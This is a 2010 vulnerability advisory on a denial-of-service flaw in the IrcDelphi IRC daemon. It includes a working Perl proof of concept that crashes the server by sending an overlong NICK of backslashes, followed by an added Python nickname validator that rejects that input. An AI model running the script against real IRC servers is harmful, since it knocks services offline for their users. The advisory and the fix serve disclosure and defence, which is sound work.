
IrcDelphi Daemon Server Denial of Service

Posted on 08 July 2010

=========================================
IrcDelphi Daemon Server Denial of Service
=========================================

[Software]
- IrcDelphi Daemon Server

[Vendor Product Description]
- IRC Daemon (IRCd, IRC Server) coded in Delphi/Kylix using Indy components. Easy to use and light irc daemon.

[Bug Description]
- The IRC daemon does not sanitize the NICK variable correctly, leading to a denial-of-service flaw.

[History]
- Advisory sent to vendor on 06/21/2010.
- No response
- Public adv. 07/02/2010

[Impact]
- Low

[Affected Version]
- IrcDelphi core-alpha1
- Prior versions may also be vulnerable.

[Codes]

#!/usr/bin/perl
# Proof of concept from the advisory: sends a NICK of 200 backslash characters.
use IO::Socket;

# Both host and port are required.
if (@ARGV < 2) {
    usage();
}

$ip   = $ARGV[0];
$port = $ARGV[1];

print "[+] Sending request...\n";

$socket = IO::Socket::INET->new(
    Proto    => "tcp",
    PeerAddr => "$ip",
    PeerPort => "$port") || die "[-] Connection FAILED!\n";

# Register with USER, then send the NICK value.
print $socket "USER AA AA AA :AA\r\n";
print $socket "NICK " . "\\" x 200 . "\r\n";

sleep(3);
close($socket);

print "[+] Done!\n";

sub usage() {
    print "[-] Usage: <" . $0 . "> <host> <port>\n";
    print "[-] Example: " . $0 . " 127.0.0.1 6667\n";
    exit;
}

----------------------------------------------------------------------------------------

DcLabs Security Group
Sponsor: ipax
ipax@dclabs.com.br

[Credits]
Crash and all DcLabs members.

# Inj3ct0r.com (http://inj3ct0r.com/) [2010-07-08]

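The advisory attributes the crash to missing sanitisation of NICK. The following is an added example, not IrcDelphi code and not part of the advisory: a server-side check that applies the RFC 2812 nickname grammar and length bound before a nickname is used. The function name `check_nick` and the sample lines are constructed for illustration.

```python
import re

# RFC 2812 section 2.3.1:
#   nickname = ( letter / special ) *8( letter / digit / special / "-" )
#   special  = "[" "]" "\" "`" "_" "^" "{" "|" "}"
NICK_RE = re.compile(rb"[A-Za-z\[\]\\`_^{|}][A-Za-z0-9\[\]\\`_^{|}-]*")
MAX_NICK = 9                 # RFC 2812 length; networks often raise it
ERR_NONICKNAMEGIVEN = 431
ERR_ERRONEUSNICKNAME = 432


def check_nick(line: bytes, max_nick: int = MAX_NICK):
    """Return None for a non-NICK line, 0 for an acceptable nickname,
    otherwise the numeric error to send instead of processing the command."""
    body = line.rstrip(b"\r\n")
    if body.startswith(b":"):            # drop an optional message prefix
        body = body.partition(b" ")[2]
    parts = body.split()
    if not parts or parts[0].upper() != b"NICK":
        return None
    nick = parts[1] if len(parts) > 1 else b""
    if nick.startswith(b":"):            # trailing-parameter form, "NICK :bob"
        nick = nick[1:]
    if not nick:
        return ERR_NONICKNAMEGIVEN
    # Bound the length first: backslash is a legal nickname character, so a
    # character whitelist alone would accept an arbitrarily long run of them.
    if len(nick) > max_nick or not NICK_RE.fullmatch(nick):
        return ERR_ERRONEUSNICKNAME
    return 0


# Constructed sample input: the two lines the advisory's script sends,
# followed by ordinary and malformed registrations.
SAMPLES = [
    b"USER AA AA AA :AA\r\n",
    b"NICK " + b"\\" * 200 + b"\r\n",
    b"NICK alice\r\n",
    b"NICK \\o_O\r\n",
    b"NICK 9lives\r\n",
    b"NICK\r\n",
]

if __name__ == "__main__":
    for sample in SAMPLES:
        print(check_nick(sample), sample[:32])
```

The 200-character value from the advisory is rejected on length alone, while a short nickname containing a backslash is still accepted.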
 
